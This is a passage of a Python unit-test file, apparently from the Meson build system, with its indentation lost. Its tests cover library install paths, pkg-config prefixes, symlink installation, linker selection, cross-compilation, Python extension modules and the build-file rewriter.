with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
        box. On Linux, BSDs, Windows, etc., you need to set extra arguments such
        as LD_LIBRARY_PATH, so the post-install checks in this test only run on
        macOS and Linux.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
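        # With proper deduplication the flag should appear at most once on any build.ninja line.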
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
                # Assert that the library flag appears exactly once on this line
                # (splitting on it must yield exactly two parts).
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
        # A c_std defined in the project options must also be in effect when compiling natively.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
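        # Use wrapper scripts as both the native and cross C compiler so that the
        # build and host compilers are effectively identical.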
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
        # Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
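        # Look up the environment variable Meson uses to select the linker for this language.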
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
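        # The primary URLs point at an unreachable server so the file:// fallback URLs get used.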
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
        # Write a test project where the first dependency() returns not-found
        # because the 'broken' subproject does not exist; that should not prevent
        # the second dependency() from being looked up on the system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '79 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
        # When cross compiling, "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
        self.fail('Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
        self.fail('Libdir specified on command line gets reset.')
def test_std_remains(self):
        # A c_std defined in the project options must also be in effect when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
        # When specifying a known name (python2 / python3), the module will also
        # try 'python' as a fallback and use it if the major version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine. If it is
            # not, or the python headers can't be found, the test raises
            # MESON_SKIP_TEST. We could check beforehand which python versions are
            # available, but that is the module's job (a chicken-and-egg problem),
            # so we just ask for forgiveness rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
                # Same as above: pypy and pypy3 are not expected to be present on
                # the test system, and the project raises MESON_SKIP_TEST in that case
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
        # The test project is configured to error out with MESON_SKIP_TEST
        # when it cannot find the requested python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
        # While 'dir' exists as a command on both Windows and Linux,
        # it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
